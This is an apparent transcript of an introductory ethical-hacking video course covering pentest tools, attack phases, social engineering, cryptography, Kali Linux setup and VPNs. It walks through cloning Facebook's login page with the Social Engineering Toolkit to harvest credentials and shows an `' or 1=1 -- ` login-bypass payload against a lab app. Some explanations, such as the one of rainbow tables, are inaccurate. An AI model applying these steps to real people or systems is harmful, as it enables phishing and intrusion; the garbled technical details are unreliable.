that an ethical hacker would utilize in their testing scenarios. To be honest, there are hundreds of tools out there. What you see on the screen are just a few examples of them. Nessus is a vulnerability scanner. What is a vulnerability scanner? It is an automated tool that is designed to identify vulnerabilities within hosts, within operating systems, within networks. So they come with their ready-made databases of all the vulnerabilities that have already been identified, and they scan the network against that database to find out any possible flaws or any possible vulnerabilities that currently exist on the host or the operating system or on the network. Similarly, there would be application scanners like acquainted or Arachne that would help you scan applications and identify flaws within those applications as well. Now, all of these are automated tools. The essence of ethical hacker is when these tools churn out the reports, the ethical hacker can understand these reports, analyze them, identify the flaws, and then craft their own exploits or use existing exploits in a particular manner so that they can get access or they can bypass the access or security controls mechanisms that are already in place. How can they do that? With the tool called Metasploit. You see that big M there on the right hand side? That M logo is for a tool called Metasploit, which is a penetration testing tool. What is a penetration testing tool? It is that tool that will allow an ethical hacker to craft their exploits or choose their exploits for the vulnerabilities that have been identified by Nessus. Since we are interacting with computers, we will always be interacting using tools, right? So the first tool, Nessus, identifies the flaws and the possible list of vulnerabilities. We do a penetration test using Metasploit to validate those flaws and to verify that those flaws actually exist, and try to figure out the complexity of those flaws. And that's where Metasploit helps us do that. Wireshark would be used in the background while we are doing both the activities using Nessus or Metasploit to keep a track of what packets are being sent and received on the network, which will help us analyze those packets. So whenever I run a Nessus scanner, I would run a Wireshark in the background. It will capture the data packets and I can go through those data packets and analyze that data packets to identify what Nessus is actually trying to do. Similarly, when I try to attack a machine using exploit on Metasploit, I will keep on Wireshark running in the background to capture the data packets that have been sent and the responses that I've received from the victim, so that I can also go through those packets and analyze the responses and analyze the attack, whether it was successful, to what extent was it successful, and basically will also give me a validation, a proof of the activity that has happened. Nmap is another automated tool that allows me to scan for open ports and protocols. So why would I use Nmap? Because ports and protocols become an entry point for a hacker to gain access to devices. For example, when we connect to a web server, we connect through a web browser, but we automatically connect to port 80 using HTTP and port 443 is using HTTPS. So if I'm connecting to a web server using HTTPS, it is safe to assume that port 443 on the web server is open to accept those connections. Similarly, there would be other services that may be left open on the web server because nobody thought about configuring it, or they misconfigured the web server and they left unwanted services running. So Nmap will allow me to scan those ports and services and allow me to understand what services are being offered on that server, so then I can start analyzing that server, identify those flaws within those services, and then try to attack them. If the application that I'm analyzing is connected to a database and I want to do a SQL injection attack, or if Nessus tells me that there is a SQL injection attack that may be possible on that particular application, I can use an automated tool called SQL map or SQL map that would allow me to automatically craft all the queries that are required for a SQL injection attack and help me do that attack at the same time. So here I do not have to manually create my own queries. The SQL map tool would automatically create them for me. What I would do is I would use Nessus to identify that particular flaw. If Nessus reports that flaw, I would then go use the tool SQL map, configure it to attack that particular web server, and when I fire off the tool, it will then automatically start directing queries, SQL injection queries, to the database to see if those databases are vulnerable, and if yes, what data can be retrieved from those databases. So all of these tools in a nutshell would help me hack networks, applications, operating systems, and host devices. And this is what an ethical hacker does. They use these kind of tool sets, they identify what attacks they need to do, they identify the right tool for that particular attack, and they write their exploits, they create those attacks, and then they start attacking, analyze the response, and then give a report to the management, providing them feedback about how the attack was created or crafted, what was the response to that attack, and whether the attack was successful or not. If successful, they would also give recommendations of what to do to prevent these attacks from happening in the future. So when we are doing these attacks, or when we want to launch these attacks, what is the process that we would follow? So there are 6 steps that we would do as an ethical hacker. If you're just a hacker, you probably wouldn't do the 6th step, which is a reporting step. So the first step that would be done is the reconnaissance phase, which is the information gathering phase, which is very important from an ethical hacker's perspective or a hacker's perspective. Because if I want to attack someone or something as a digital device, I need to know what I'm attacking. I need to know the IP address of the device, the MAC address of those devices. I need to know the operating system, the build or the version of that operating systems, applications on top, the versions of those applications, so I know what I'm attacking. For example, if I want to attack a server, I assume it's a Windows-based server and I use a particular tool to attack it, but it actually turns out to be a Linux-based server, my attacks are going to be unsuccessful. So I need to focus my attack based on what is there at the other end. So in my information gathering phase, I want to identify all of that information. Once I have that information done, I'm going to scan those servers using tools like Nmap that we just talked about, and we're going to try to see the open ports, open services, and protocols that are running on that server that can give me possible entry points within the network or within the device or within the operating system. At the same time, along with the scanning with Nmap, I would run a vulnerability scanner, the Nessus vulnerability scanner we talked about, or Acquainted for applications, and then I would try to identify vulnerabilities in those applications, operating systems, or networks. Once I have identified those vulnerabilities in the scanning phase, I would then move on to the gaining phase, where I would then craft my exploits or choose existing exploits and start attacking the victim. At this point in time, if my attack is successful, I will probably have gained access by either cracking passwords or escalating privileges or exploiting a vulnerability that I may have found during the scanning phase. Once I have gained my access, I want to maintain my access. Why? Because the vulnerability may not be there for long. Maybe somebody updated the operating system and hence the flaw was no longer existing, or somebody changed the password that I may have cracked, thus I no longer have access. So what do I do to maintain my access? I install Trojans or backdoor entries to those systems using which I can secretly, in a covert manner, get access to those devices at my own will, at my own time, as long as those devices are available over the network. So that's where I maintain my access. I have hacked them. Now I want to maintain my access, so I install a software which would give me a backdoor entry to that device no matter what. Once I have done this, I want to clear my tracks. So whatever activity that I've been doing, for example, installing a Trojan. A Trojan is also a software that would create directories and files once installed on the victim's machine. So I want to hide that. If I have accessed data stores, if I have modified data, I want to hide that activity, because if the victim comes to know that something has happened, they would start increasing their security parameters. They might start scanning their devices. They may take them offline. Thus my hack would no longer be efficient. The reason I'm clearing my tracks is that the victim doesn't find out that they have been hacked or they have been compromised, or even if they do find out that they've been compromised, they cannot trace the compromise back to me. So I would be deleting references of any of the IP addresses or MAC addresses that I may have used to attack that particular device. And this is where I will be able to identify where those logs were created, where those traces are. Once I take off those traces, the victim would not be any wiser of whether they have been compromised or who compromised their system. And if I am successful at all of these stages, or to whatever extent the success that I've achieved in any of these stages, I would then create a report based on that, and I would report to the management about the activities that we have been able to do and whatever we have been able to achieve out of those activities. For example, we identified 10 different flaws. There were 20 different attacks that we wanted to do. What attack did we do? What was the outcome of that attack? What was the intended or the expected output of that attack? I'll create a report which would give a detailed analysis of all the steps that were taken, along with screenshots and evidences of what activity was conducted, what was the output, what was the expected output, and I would submit that report to the management, giving them an idea of what vulnerabilities and flaws exist in their environment or their devices that need to be mitigated so that the security can be enhanced. So these are the 6 steps that the ethical hacking process would take. Just going through this, the reconnaissance is where you're going to use hacking tools like Nmap, HPing to obtain information about targets. There are hundreds of tools out there depending on what information you want. Then in scanning, again, Nmap, Nexpose, these kind of tools to be utilized to identify open ports, protocols, and services. In gaining access, you're going to exploit a vulnerability by using the Metasploit tool that we talked about in the previous slides. In the maintaining access, you're going to install backdoors. You can use Metasploit at the same time. You can craft your own scripts to create a Trojan and install it on the victim's machine. Once you have achieved that, clearing tracks is where you're going to clear all evidences of your activity so that you do not get caught or the victim doesn't even realize that they have been hacked. And once you've done all of this, we are going to create reports that are going to be submitted to the management to help them understand the current security evaluation of their organization. So now let's see how we can hack using social engineering. Now, what is social engineering? Social engineering is the art of manipulating humans into revealing confidential information which they otherwise would not have revealed. So this is where your social skill and your people skills come into the picture. If you are able to communicate effectively to another person, they would probably give up more information that they intended to give out. Let's look at examples, right? If you see on the screen, phishing activity. What is phishing? We receive a lot of fake mails on a regular basis. We have always received those emails where we have won a lottery of a few $1 million, but we have never realized that we didn't purchase a lottery to win a lottery in the first place. We have always had those Nigerian frauds where a prince died in some South African country and you out of 7 billion people on the planet have been identified where they want to transfer a few $100 million through your account and they want to give you 50% of that money in return as thank you. So some very basic attacks where you go onto websites and there's a banner flashing at you saying congratulations, you're the 1 millionth visitor to this website, click here to claim your prize. All of these are social engineering attacks, phishing attacks, fake websites, fake communications being sent out to users to prey on their gullibility. Most of humans always have that dream of striking it rich, winning a huge lottery once and for all, and living their life lavishly ever after. But sadly, in the real world, that doesn't happen that often. And if you're receiving those mails, it is very important that you first research the validity of those communications before you even want to act upon them. So why are humans susceptible to social engineering? Because humans have emotion. Machines do not. Try pleading with a machine to give you access to an account that you have forgotten a password to. The machine wouldn't even know what you're doing. Try pleading with a human, sympathy or empathy, where you could try to create a social engineering attack where you can plead with them saying, if I do not get access to this account immediately, I might lose my job. And then that would put my family into problems. Somebody would feel empathy or sympathy towards you and help you reset that password and give you access to that account. It's how good the attack is and how convincing you are for the success of this attack to happen. So what is a familiarity exploit? Attackers interact with victims to gain information which will benefit the attackers to crack credentials. As passwords, if we want to reset our passwords, what do we have as a mechanism to resetting passwords? We have some security questions that we set up. Those questions are nothing but personal information that we would know, but through a social engineering attack, it would be easily be able to gather the information that you have set for your security questions. The security questions can be as simple as the first school that you attended. You probably have that listed on your LinkedIn profile, where a person can just go in there and see your academic qualifications and identify the school that you were in, right? Similarly, it might also be a question, what was your mother's maiden name? That's a very good attack. And that's, if a person can interact with you, let's say they're trying to take a survey and they approach you for a feedback on a particular product that you have been utilizing, and they ask you these questions, you wouldn't think twice before giving those answers. As long as the request sounds legitimate to us, we are able to justify that request, we do answer those queries. So it's upon us to verify the authenticity of the request coming in before we answer it. Phishing, as discussed, would be fraudulent emails which appear to be coming from a trusted source. So email spoofing comes into mind, fake websites, and so on and so forth. Exploiting human curiosity. Curiosity killed the cat, right? So there's so many physical attacks where hackers just keep pen drives lying around in a parking lot. Now this is a generic attack. Whoever falls victim will fall victim. So if I just throw around a few USBs in the parking lot, obviously with Trojans implemented on them, some people who are curious or who are looking for a couple of freebies might take up those pen drives, plug them in their computers to see what data is on the pen drives. At the same time, once they plug in those pen drives on their computers, the virus or the Trojan would get infected and cause harm to their machine. Then exploiting human greed. We just talked about the Nigerian frauds and the lotteries, those kind of attacks, the fake money making gimmicks. Now basically this is where you prey upon the person's greed kicking in, and they are clicking on those links in order to get that money that has been promised to them in that email. So one of the safest mechanism to keep data private and to keep yourself secure is using encryption. Now encryption can happen through cryptography. What is cryptography? Cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user. The only person with the key to unscramble that data would be able to unscramble it and make sense out of that data. So we're just making it unreadable or non-readable by using a particular key or a particular algorithm, and then we're going to send the key to the end user. The end user using this same key would then decrypt that data. If anybody compromises that data while it is being sent over the network, since it is encrypted, they would not be able to read it. So the encryption algorithm would be something like this. Now if you see the computer word once made into unreadable format would look like EQORXVGT. For an end user it wouldn't make any sense, but the person who has a key to unscramble that would be able to convert it back to computer and then understand the meaning of that word. So this is just a substitution cipher that is being shown on the screen. So what is the alphabet? The key is alphabet plus 3. So C plus 3 alphabets, that becomes E. O becomes Q. M becomes O. So the key that is utilized to scramble the data is the character that you are at. The third character from there would be the corresponding key. So the encrypted message is also known as a cipher. The decryption is just the other way around, where you know the key now and you can now figure out what that E corresponded to by going back 3 characters in the alphabet. Most of the times a certified ethical hacker must decrypt a message without knowing the secret key. So let's say a ransomware has affected your organization or has affected a device, and you want to figure out or you want to decrypt that data. Now as an ethical hacker, you wouldn't be for paying a ransom to the hacker, would you? So it is now your prerogative of how you're going to work around and how you're going to try to crack the encryption mechanism, how to crack the cipher to decrypt that message and see what's within it, right? Decryption without the use of a secret key, that is known as a cryptanalysis. Cryptanalysis is the reversing of an algorithm to figure out what the decryption was without using a key. So cryptanalysis can be done using various formats. The first one is a brute force attack, second is a dictionary attack, the third one is a rainbow table attack. A brute force attack is trying every combination, permutation and combination of the key to figure out what the key was. It is 100% successful, but may take a lot of time. A dictionary attack is where you have created a list of possible encryption mechanisms, a list of possible cracks, and then you try to figure out whether those cracks work or not. Rainbow tables are where you have an encrypted text in hand and you're trying to figure out the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place. So in the brute force attack, you're trying every possible combination, permutation of what the key would be. In dictionary attack, you have a word list that would tantamount to the key, and if you're trying to match all the words listed in the text file or the word list to see if any of those words are going to work to decrypt that data. Here in the rainbow table, the ciphertext is compared with another ciphertext. You find out similarities and then you try to work or reverse engineer your way accordingly. So let's have a quick demo on cryptography before we end this session. So to begin with the demo of cryptography, we are on a website called spammimic.com, which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand. So if I say I want to encode a message, turn a short message into spam. So what this does is, you want to send across a secret message, you type in the secret message, a short one, and it will convert that into a spam mail. You send it across, so whoever's reading that spam mail would never get an idea of the embedded message within it. So if I want to type in a message here, hi, this is a secret message, the password is ASD@1234, and I want to send this out to people or to one of my colleagues, but I want to send it out in a secret manner so that others are not aware of this. So when I press on encode, what the algorithm will do is it will convert this message into a spam mail. So my message, hi, this is a secret message, the password is @1234 or ASD@1234, gets converted into this. Now if you read it, dear e-commerce professional, this letter was specially selected to be sent to you. This doesn't make sense. There is nowhere or no reference to the actual message that I've already said. So if I copy this entire message and I send it, let's say via email, to the recipient. Now the thing is that the recipient needs to know that I've encoded it using spam mimic. The algorithm needs to remain the same. So once they know that it is spam mimic, what they can do is, now in this instance what I'm going to do is I'm going to open up a new browser and I'm going to go to the same website. And at this point in time, I'm going to click on decode. When I click on decode, I'm going to paste the message that I've just copied. There we are. And this message is now being copied into a different browser. And if I decode this, you will see that it will convert it back to the original message that there was. So the key is there @spam mimic, and it is embedded within the message. So whenever we paste the message in the decode factor, it knows what the key was and it can decrypt that message and give me the actual message that was embedded within it. There we are, the entire message. This is what we created in the Google Chrome browser, and in the Firefox browser we decoded. Similarly, if I want to protect these kind of messages, there is an aspenencrypt.com website where, let's say, we use text encryption and I want to encrypt the same message. This is a secret message. The password is ASD@1234, and then I give it a password to protect this message, let's say the word password, and I use the cipher to scramble this by using, let's say, AES, which is the strongest cipher right now, and I say encrypt. So this is what the encryption would look like, and basically if I don't have the password over here, if I decrypt it, you would see that the error has occurred. Now if I type in the password over here and then decrypt it, it will be able to convert that back into the unscrambled text, and it will give me what the original message was. This is a secret message. The password is ASD@1234. So if I want to keep my data secure from hackers, I want to scramble it in such a way that they would not be able to crack it, or it would be very difficult for them to crack it. And this is one of the first mechanisms that would be recommended by any ethical hacker to keep the data secure. Now let's talk about downloading and installing Kali Linux. Along with that, we'll also be looking at the basic commands that are required for Kali Linux. Alright, so I've opened my browser and we want to go to the Kali website. So we want to go to kali.org. You can directly type in kali.org and go to the website. I can just do a Google search and say Kali download, and it will give you the same website, but it will directly take you to the downloads pages. So either here or you can go to the home page. Cookies are being installed on your machine, so see which cookies you want to allow. I'm only going to use the necessary cookies to support this site, and you can see that this gives you the latest Kali Linux news and tutorials, gives you the latest release, what is in that release, and gives you a lot of documentation which will help you understand what tools have been developed and what functionality has been given in the latest version. If you want to download, you can directly go here and you can download Kali Linux. Now, Kali Linux is a 2.6 gigabyte download, so it's going to take time, the latest version being 2019.4. And we click over here. I'm using a download manager to manage all these huge downloads, and you can see it's pointed to the operating systems folder, and it is going to be a 2.57 GB download. So we click on download, and in the background, you can see this is going to be downloaded, and we're going to minimize this. And it will take a few minutes for that to download, but this is an ISO image, so we need to install it on a virtual machine. So what we need is we need to use a hypervisor which will allow us to create virtual machines. So we can either use VMware Workstation, which you can download from here. However, this is paid version, so you can see it is around $250 or something for this software, but it is a very good software to have. So if we click on download now, it is going to start the download. It's a 30-day trial period if you want to use it. After 30 days, you'll need to enter the key, which you'll get after purchasing the software. If you do not want to utilize this, the free version that you have, you can either download VMware Player, but there are some limitations for VMware Player that you might want to look at. You want to compare these products before you want to purchase them, right? Otherwise, you can download Oracle VirtualBox, which is a free hypervisor. It's not as robust as VMware Workstation, but it does the trick, right? So the free version 6.1 is free, and you can then create your own virtual machines over there and install operating systems on them. What I already have a VMware Workstation installed, so I'm just going to open that up, and that's my VMware Workstation. As you can see, I already have a lot of virtual machines created over here. What we are going to do is we are going to configure a virtual machine for the Kali Linux operating system that we are downloading, which should be somewhere here. Let's see, it's at 43%, so halfway there. Till then, let's create the virtual machine. So I click on File, create a new virtual machine. I'm going to customize the machine, so click on Next. This leave it default, we don't want to change that, and then we want to install the operating system later. We don't want to point it out right now, so I'll just click on I will install the operating system later. Click on Next. We want to install Linux. Now in the drop down, you would not see Kali Linux over here. However, you can choose Ubuntu 64-bit. That's what I'm going to choose. There it is. Next. What is the name that we want? I want to give it Kali Linux without the typo, and I want to store it in one of the folders that I've created. By default, it stores on the C drive, which is not a good place to store. You don't want to run out of space on your C drive. So I'm going to click on this PC, and this is my data, and in here I'll have a folder called virtual box or virtual machines. There it is, within which you can see the other softwares that I already created. I'm going to create a new folder and call it Kali 2019 L. L for is latest for me, because you can see I already have a Kali Linux. So I'm just going to identify this folder with the L at the end. Going to select it and click on OK. You can see the path being changed over here. Click on next. It's going to ask you how many processors. Now, depending on the processor that you have, you can see I've got an 8-core i7. So if I give it 16 cores or 16 processors, that's not going to work. I cannot go beyond what the physicality already is. So for this machine, one processor with 1 core is more than enough. If you're going to use a lot of tools at the same time, you might just want to give it 2 cores. So we're giving it 2 cores. It will ask us for RAM to be provided for this virtual machine. By default, 2048 megabytes. That's 2 GB of RAM is more than enough. If you require more, we can change this later on. So click on next. We want to use NAT for now. Leave this default. Next. Whatever is recommended, keep it the way it is. We do not want to change it. Next. Create a new virtual hard disk for this machine. And it is going to ask us the size. 20 GB is more than fine. Store it as a single file. We don't want to use multiple file options. Click on next. And then click on browse, where we want to store the VMDK file or the virtual hard disk file. And we go back again to the same folder that we had created, virtual machines, and we look at the Kali Linux, Kali 2019 L, and we want to store the VMDK file over there. Once we save it, we want to click on next, and then we want to click on finish. So this is the virtual machine that has been created right here, right? Now, this is the basic configuration. Now, where are we at with the operating system? And you can see the operating system has been downloaded, and it is stored in this particular folder. So we go to E drive. So we are looking for the operating system that we have downloaded. We downloaded it in the operating systems folder. And if we go in here, you can see the current one, the Kali Linux 2019.4 ISO right here. So what we do, we go back to the Kali Linux machine that we have created, edit virtual machine settings, and we point this virtual machine using the CD DVD, and then we point the ISO, the one that we downloaded over here. So we go back to E drive, we go back to OS, and we click on Kali Linux 2019, click on open. So now when this boots up, it will boot up with this ISO, and then it will allow us to install the operating system. So click on OK. Then we click on power on this virtual machine. It will start powering on. It will boot to the ISO, and it will start giving us the booting option. So I'm just going to enter the full screen mode over here for this to be better visible. And we don't want the live mode. What we want is we want to use the graphical install. And then we highlight that, we press enter, and you can see the setup starting up. We'll wait for the GUI to pop up. There it is. Which language do we want? For now, we want English. Click on continue. Where are we located? Click on continue. And the configure your keyboard. We want the US keyboard, American English. Continue. It is going to detect the hardware. So as you can see on the screen, it's attempting auto configuration for most of these settings. The network with DHCP, it has identified the network cards, hardware like the processor that has been provided. Now it is asking for a host name. We're going to leave it at default. We're going to click on continue. Domain name, I'm not joining this into a domain as yet. This is going to be a standalone machine, so I can leave this blank. Click on continue. Now it is going to configure the network. It is asking for a password at this point in time, the root password. Type in any password that you want. Ensure that you remember the password. Now, by default, the username for the account is the word root. We are just creating the password for the root account. And then we want to click on continue. Setting up the clock, looking at the hard disks. Now, here it asks us, do we want to use the entire disk, the 20 GB virtual hard disk that we had provided, or do we want to give it a manual configuration or a guided one where we want encryption and a logical volume management coming into the picture. We're just going to use the first option, guided, use entire disk. Don't worry, it's only going to use the virtual disk that we had created. Click on continue. It will give us that it's a 21.5 GB VMware virtual disk that we had. And click on continue. All files in one partition, that's what we want, recommended for new users, whatever it is. We don't want to change these folders. Continue, and this is what we have configured. Once we click on continue, it is going to say, are you sure you want to make these changes? Click on yes. Click on continue, and it will start installing Kali Linux on your device. Now this is going to take a few minutes. for the installation to work. Alright, so that's the installation that's completed. Now it's asking us to configure a package manager. A network mirror can be used to supplement the software that is included on the installation media. This may also make newer versions of software available. Do you want to use a network mirror? We can click no for now and then click on continue. Now this is going to install the grub bootloader. This might take a few minutes as well. Install the grub loader to the master boot record. Yes. Click on continue. Click the hard disk that you have just utilized. This is the one. Click on continue. It will install the grub bootloader, running through the last phases of the installation. And now it says the installation is complete. We want to click on continue, finishing the installation, and then it will do a reboot. Alright, and you can see this is starting up. So we are going to you just wait out the boot, and now it started the booting sequence. Just going to maximize the screen. And you can see it's asking me for the password. This is the one that we created. Now that's not the password, that's the username, that's the root, and the password that we had created at that point in time. And then click on login. And this is your screen. Now what we need to do here is we need to install VMware tools, which will help us manage the screen and help the virtual machine to be a little bit better integrated on the system. So that's not mounted yet, so we're just waiting for it to mount. There it is. And what we want to do here is open VMware Tools Upgrader. Alright, so what we want is we want to extract, or we want to use this Open X Archiver, and once we do that, we'll see the VMware install.pl. Double click on that. Alright, we've got the VMware tools here. What I've done is we have extract to, and I've extracted that on the desktop, right? So what we just did was click on the desktop over here, open, and this is what it will do. And click on extract. Now the error is happening because I've already extracted this. Open this up. We want to run this VMware install.pl. So what do? We open up the terminal window, which is the command line interface over here. And now this is where some of the commands come into the picture. So for example, pwd will show us the present working directory. ls will show us the list of the folders that are there. So the folder that we have is on our desktop. So we'll just change directory to desktop, press enter, do an ls, that will show us the list, and you can see VMware tools distrib. That's the folder that we have right here. Right, so we want to go into that folder, cd VMware. At this point, you can just click on tab and it will populate everything over there. Press enter, do an ls, and we want the VMware-install.pl to be executed. Alright, so we tried executing that command. We had an error over there. So what we need to do is we need to execute this command. So /VMware install.pl, and it will start creating. Now it will ask you for your input installing VMware tools. In which directory do you want to install the binary files? By default it is going to use /usr/bin. If I just press enter, it is going to use the default. As you can see, the input over here. What directory do you want the init directories? I'm just going to press keep on pressing enter for the defaults to come in. This part does not exist. It is going to create it. Default yes, defaults everywhere, and then it tries to start initializing it to maximize the screen, and this is where it is installing. And you can see by just installing that, it automatically adjusted the screen, and now we got a full screen of Kali Linux right here. Right, and that is what VMware tools does for us once we have installed the operating system. And now you can see the entire screen. On here you will see the tool sets that are given here. Now why are we using Kali Linux in the first place? Because this comes in with a bundle of thousands of softwares that are ready to be utilized for ethical hacking. Right, and they have been categorized over here for information gathering, vulnerability analysis, web application analysis, and so on and so forth. So you can see from forensics onwards, reporting tools, and as you scroll down, you can see your development tools, graphics coming in, internet, and the system configuration coming into the picture. These are your settings for your operating system. So these are basically your tools. We are right now on the favorites. If I click on information gathering, you will see that other tools for information gathering start appearing over here. For vulnerability analysis, we have got Sparta, Nmap, fuzzing tools, web application analysis, we have got comics, Kipfish, SQL map, database assessments, password attacks, and so on and so forth. So if you just go in the favorites, this was the terminal emulator that we utilized. This is the command line that we saw. We use the cd command. we use the pwd command. We did the ls command as well to give us the list of the directory that we are in. Similarly, there would be commands like cat. So let's go to cd downloads. Let's see what's there. You can see this case sensitive. So if I type in a capital D and then do a tab ls, there's nothing over here on download. So cd ... will take us back one directory. Now you can see we are back from downloads to root. If I want to go to desktop, this is how I go to desktop. Do a ls. You can see the VMware tools folder over there, cd VMware tools, and we go into that folder ls, where it will give us the list of all those files. Now you can see install is a file that we had edited back then. So if I do a cat install, you will see the cat basically is the command that will help us look at the contents of the file, all right, without opening up the file or without editing the file. So you can see just if I scroll up, this is where we gave the cat command. It then printed the contents of the file over here, and then it exited and gave me back to the command line right here, right? Now if I want to copy this, cp root desktop VMware install, and if you want to copy it to root downloads and press enter. Now what we are going to do is we are going to see if this file, the install file that we just edited over here, has been copied to the downloads folder. So we are currently in the VMware, on the desktop VMware tools district folder. We do a cd ... that takes us down one directory. So we are still in the desktop. Do a cd ... Now you can see we are back in the root, and now we are going to do a cd downloads, do an ls, and you can see the copied file right here. So if I do a cat install, you can see the same content of that file coming in. So these are some of the commands that we would need to learn as we go ahead. The remove command is, let's say we've got install, we do a man rm. Man is the manual page command that gives us the pages with the description of how that particular command is to be utilized. So rm is remove files or directories. Synopsis is the description, the options, -f for force, -i for prompt, capital I prompt once before removing more than 3 files, and so on and so forth. If you want to exit this, you can press Q to exit, and you come back to this page. So if I say rm install ls, you will see that the install file has now been deleted. So in Windows we use the del command. In Linux it is the rm command. So this is what we wanted to look at, the demo for Kali Linux, how to download it, how to install it, and some of the basic commands that we can utilize. Let's look at a practical at this point in time for phishing. Alright, let's begin with the phishing tutorial. We have the Kali Linux operating system booted up over here. What we are going to do is we are going to open up a tool called SET, Social Engineering Toolkit, which you would find in this option, and that's the tool that we want. It's a command line tool, a menu driven tool. We are going to host a fake Facebook page, and we can see how we can harvest credentials by this kind of an attack. So these are some disclaimers you might want to go through there. Do you want to agree to the terms of service? Yes. Press enter. And that's your social engineering toolkit, and we are talking about a phishing attack which comes under the social engineering attack. So like I said, it's a menu driven tool, so we just have to look at these options and then just type in the number of the option that we want. So we want to do a social engineering attack, so I type in 1, press enter. In that it is asking me whether I want a spear phishing attack, a website attack vector. We are going to choose a second option, so I type in 2, press enter, and then it asks me what I want to do. I want to take the third option here, credential harvester attack methodology, and we want to do the third attack. Now it is asking whether we want to use the in-house website templates that it already has, or do we want to clone a site, or do we have a customized site that we have prepared that we want to migrate into this tool. We are going to do the site cloning option, so we are going to type in 2, press enter, and then it is going to ask me the IP address where it wants to capture and store the credentials. By default, this is the IP address that I'm using, so if I leave it blank, it will take my default IP address. So I'm just going to press enter, and now it is asking me the URL to clone. So I type in https://facebook.com. What it is going to do, it is going to connect online, and it is now it has cloned the website, Facebook login.php. The best way to use this attack is that if the username and password form are in the same field or the same page. Regardless, this captures all posts on a website. So you may need to copy ** into HTML depending on where your directory structure is. Press return if you understand what we are saying here. So press enter, The social engineering toolkit credential harvest attack is running on port 80. Information will be displayed to you as it arrives. So the site was 71.134, right? The default IP address, and this is where the website is being hosted. Let's check that out. So let me open up a browser on my host machine, and let me point it to the Kali Linux machine that we have just created, 192.168.71.134, and you should see a login to Facebook coming up right here. Looks genuine. It is genuine because we just went online and downloaded this. Let's just have a recap. Let's have an explanation of what we are trying to do. I am trying to host fake Facebook page on my server which has an embedded script in it which is going to do credential harvesting. So the attack here is, let's say if I'm now hosted this, I can craft a fake email, send it across to a victim saying your Facebook account has seen some unforeseen activity, create a hyperlink using HTML coding. Within that, click here to access your account and verify that the account is secured. And when they click on that link, they will be redirected to my fake page, which is here. You can see the IP address is my virtual machine's IP address, but I'm seeing a Facebook login page, and I'm going to type in someone@somewhere.com, and the password I'm just going to type in the regular ones that I use. And if you see it, when we typed in the username and password, the page just refreshed and gave us the login page again. But now if you look at the URL, I'm actually on Facebook's login page, which is exactly the same that I was hosting. So a layman wouldn't probably figure out they've been hacked by now. They just would figure out, okay, they probably typed in the incorrect password and the page refresh or something like that, and they're just going to log in and they're actually going to access the Facebook page. Thus, they might not even realize that something went wrong. But if I go back to my virtual machine, you can see that it has captured some data and it is reporting over here of what has happened. So if I just scroll up, let's see what happened here and if we have been able to capture anything. So we got a hit printing the output. This is the HTTP 1.1.200. Okay, response coming in, password field found, and we're just looking. There it is. Email someone@somewhere.com, and password that I typed in ASD@1234. So it has captured the username and the password right here. Once we are done, I mean, this is the way attackers work. Now, this is a very basic attack. Again, in the actual trainings, you would then look at how you would host this on a real website, make it a global attack. Right now, it's a virtual machine with a class C IP address. So here, the thought process is, where can we get a free hosting where we can host this kind of sites? Maybe I'll have to purchase a domain which looks like similar to Facebook or the victim that I'm trying to attack. So this is just a POC. So we just wanted to find out if we can, how phishing is done. And this is exactly how it is done, right? So pressing Control C would exit this tool and takes you back to the actual menu. Press 99 to exit, and there it is. Close the window, and that's the phishing practical. After phishing, let's talk about SQL injection. SQL injection stands for structured query language injection, which is a database attack, though it resides within the application. So it's the application vulnerability that we are trying to look at to try to bypass authentication. As the name suggests, a SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement. What is a SQL statement? A query that is used by an application and is fired off to the database. Database executes that query, gets that information that is required, and sends it back to the user if the user is authenticated. So we're going to look at the SQL injection attack demo here. And what we are going to do is we are going to go back to our VMware workstation. And I've got a tool over here called OWASP, Broken Web Application, which is a utility that has been created for people like us to test our skills, to learn on how we can develop our skills further. So this has a lot of vulnerable applications built within it. We're just going to try to access it, and we're going to see if we can create a SQL injection attack. Just waiting for it to boot up. Once it boots up, it will give us an IP address. There we are. So we need to connect to 71.132. So I can just use the same browser I was using, close up Facebook, and now go to 192.168.71.132. And this is the OWASP Broken Web Application project. What we're going to do is we're going to go to Utility, and this is an application that has a lot of information within it. You can see it gives you links about what you should do, help me, video tutorials, listing of vulnerabilities that they have, and so on and so forth. So you can see we are not logged in right now. I'm just going to do this as a demo. So what we're going to do is we're going to look at this and bypass authentication. So we are taken to the login page where you need a username and password to log in. I'm going to type in test as the username and test as the password. Click on login and you can see that account does not exist, so the authentication mechanism works. Now what we want to do is we want to create a query. Now what does a query look like? When I type in a username and a password, if I just type in a single quote here, it is going to create an error, and this is what a SQL query looks like. Select username from accounts where username is a single quote, and then the exception error happened, so it's not showing the rest of the query to us. Now what I'm going to do is I'm just going to craft a query here, single quote, and give it a condition or 1 equals 1 space hyphen space. What happens, hyphen space is comments out anything after that. So the password field is being commented out at this point in time, and I'm just giving it a condition where the condition is true. 1 does equal 1. And if this condition is true, it is going to allow me to log in. So you can see right now we are not logged in. This bypasses the authentication mechanism, and you can see user authenticated, and we are now logged in as admin. So in the training, what we need to understand as a whole is how SQL works, what are the queries that are structured with, how you can, what are the testing operators. Now, the single quote that we used, that was an operator in the SQL syntax, what these operators are, how they function, and then how you can leverage these attacks. There are different tools that are given to you in Kali as well that you can utilize. So in Kali Linux, you can just open up a command prompt, and there's a tool called SQL map. You need to give it a particular site. So SQL map -u for the URL and whatever the URL is. Now URL here, and then once you're here, you just press the enter key. This tool will craft all the queries in the background for you. You don't even have to know SQL query or SQL languages. This is a very easy tool to utilize. Sadly, I cannot demo this on a live website because that would be illegal, but you can see how you can operate this yourself. That's what SQL injections are all about. Moving on, we now talk about VPNs, virtual private networks. And a virtual private network is basically a secure network that allows me to anonymize myself over the internet. So what I'm doing is I'm connecting from here to a server that encrypts my channel, encrypts my connection, and thus allows me to keep my data secure. Now, the basic essence of a VPN or a virtual private network is to allow me this encryption mechanism where I can encrypt and safeguard my data. The added advantage that nowadays a VPN gives is that they can allow us to spoof our IP address or obfuscate our IP address so we can actually become anonymous on the internet. It can allow us to use multiple IP addresses and thus secure ourselves on the internet. For example, I use VPN called CyberGhost. And what this allows me to do is it allows me so many servers over here. If you look at the entire list, all the servers, then there are no spy servers, which guarantee me that they are not going to keep and store any logs. And thus, they are not going to record any of the activity that I'm doing. Right? Since they are located out of Romania, this becomes a little bit more safer for me because the government and the laws over there are a little bit more relaxed than other countries. They give me different links for 